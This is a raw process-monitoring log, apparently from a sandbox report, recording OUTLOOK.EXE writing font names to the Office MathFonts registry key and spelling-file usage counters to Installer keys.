OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gill Sans Ultra Bold Condensed

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gisha

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gloucester MT Extra Condensed

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Goudy Old Style

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Goudy Stout

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gulim

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

GulimChe

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gungsuh

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

GungsuhChe

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Haettenschweiler

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Harlow Solid Italic

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Harrington

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Headline R

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGGothicE

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGGothicM

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGGyoshotai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGKyokashotai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGMaruGothicMPRO

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGMinchoB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGMinchoE

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPGothicE

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPGothicM

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPGyoshotai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPKyokashotai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPMinchoB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPMinchoE

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPSoeiKakugothicUB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPSoeiKakupoptai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPSoeiPresenceEB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSeikaishotaiPRO

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSGothicE

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSGothicM

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSGyoshotai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSKyokashotai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSMinchoB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSMinchoE

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSoeiKakugothicUB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSoeiKakupoptai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSoeiPresenceEB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSSoeiKakugothicUB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSSoeiKakupoptai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSSoeiPresenceEB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

High Tower Text

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYGothic-Extra

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYGothic-Medium

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYGraphic-Medium

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYGungSo-Bold

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYHeadLine-Medium

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYMyeongJo-Extra

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYPMokGak-Bold

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYPost-Light

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYPost-Medium

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYShortSamul-Medium

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYSinMyeongJo-Medium

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Impact

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Imprint MT Shadow

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Informal Roman

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

IrisUPC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Iskoola Pota

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

JasmineUPC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Jokerman

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Juice ITC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

KaiTi

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Kalinga

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Kartika

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Khmer UI

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

KodchiangUPC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Kokila

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Kristen ITC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Kunstler Script

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lao UI

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Latha

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Leelawadee

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Levenim MT

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

LilyUPC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lucida Bright

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lucida Calligraphy

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lucida Console

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lucida Fax

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lucida Handwriting

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lucida Sans

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lucida Sans Typewriter

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lucida Sans Unicode

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Magic R

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Magneto

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Maiandra GD

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Malgun Gothic

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Mangal

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Marlett

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Matura MT Script Capitals

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Meiryo

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Meiryo UI

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft Himalaya

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft JhengHei

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft New Tai Lue

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft PhagsPa

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft Sans Serif

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft Tai Le

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft Uighur

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft YaHei

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft Yi Baiti

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MingLiU

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MingLiU_HKSCS

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MingLiU_HKSCS-ExtB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MingLiU-ExtB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Miriam

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Miriam Fixed

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Mistral

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Modern No. 20

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MoeumT R

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Mongolian Baiti

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Monotype Corsiva

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MoolBoran

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS Gothic

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS Mincho

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS Outlook

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS PGothic

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS PMincho

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS Reference Sans Serif

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS Reference Specialty

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS Sans Serif

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS Serif

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS UI Gothic

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MT Extra

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MV Boli

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Narkisim

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

New Gulim

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Niagara Engraved

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Niagara Solid

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

NSimSun

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Nyala

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

OCR A Extended

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

OCRB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Old English Text MT

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Onyx

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Palace Script MT

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Palatino Linotype

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Papyrus

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Parchment

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Perpetua

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Perpetua Titling MT

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Plantagenet Cherokee

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Playbill

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

PMingLiU

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

PMingLiU-ExtB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Poor Richard

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Pristina

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Pyunji R

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Raavi

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Rage Italic

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Ravie

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Rockwell

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Rockwell Condensed

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Rockwell Extra Bold

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Rod

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Sakkal Majalla

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Script MT Bold

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Segoe Print

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Segoe Script

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Segoe UI

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Segoe UI Light

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Segoe UI Semibold

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Segoe UI Symbol

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Shonar Bangla

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Showcard Gothic

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Shruti

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

SimHei

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Simplified Arabic

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Simplified Arabic Fixed

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

SimSun

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

SimSun-ExtB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Small Fonts

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Snap ITC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Stencil

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Sylfaen

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Symbol

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

System

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Tahoma

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Tempus Sans ITC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Terminal

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Times New Roman

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Traditional Arabic

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Trebuchet MS

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Tunga

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Tw Cen MT

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Tw Cen MT Condensed

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Tw Cen MT Condensed Extra Bold

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Utsaah

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Vani

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Verdana

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Vijaya

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Viner Hand ITC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Vivaldi

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Vladimir Script

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Vrinda

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Webdings

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Wide Latin

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Wingdings

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Wingdings 2

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Wingdings 3

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Yet R

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

1332215869

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

1332215870

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

1332215869

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

1332215870

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1332215906

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1332215907

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10061400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1046

1332215815

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10061400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1046

1332215816

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10031400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1043

1332215815

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10031400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1043

1332215816

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10070400000000000F01FEC\Usage

SpellingAndGrammarFiles_1031

1332215821

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10070400000000000F01FEC\Usage

SpellingAndGrammarFiles_1031

1332215822

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10010400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1025

1332215815

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10010400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1025

1332215816

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10001400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1040

1332215815

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10001400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1040

1332215816

2428

OUTLOOK.EXE

write

